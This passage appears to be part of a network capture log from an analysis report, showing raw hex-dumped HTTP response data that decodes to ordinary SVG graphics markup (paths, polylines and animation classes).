2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7157INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                  Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7173INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                  Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7189INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                  Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7205INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7221INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7237INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                  Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7253INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                  Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7269INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                  Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7285INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                  Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7301INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                  Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7317INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                  Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7333INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7349INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                  Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7365INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7381INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                  Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7397INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                  Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7413INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
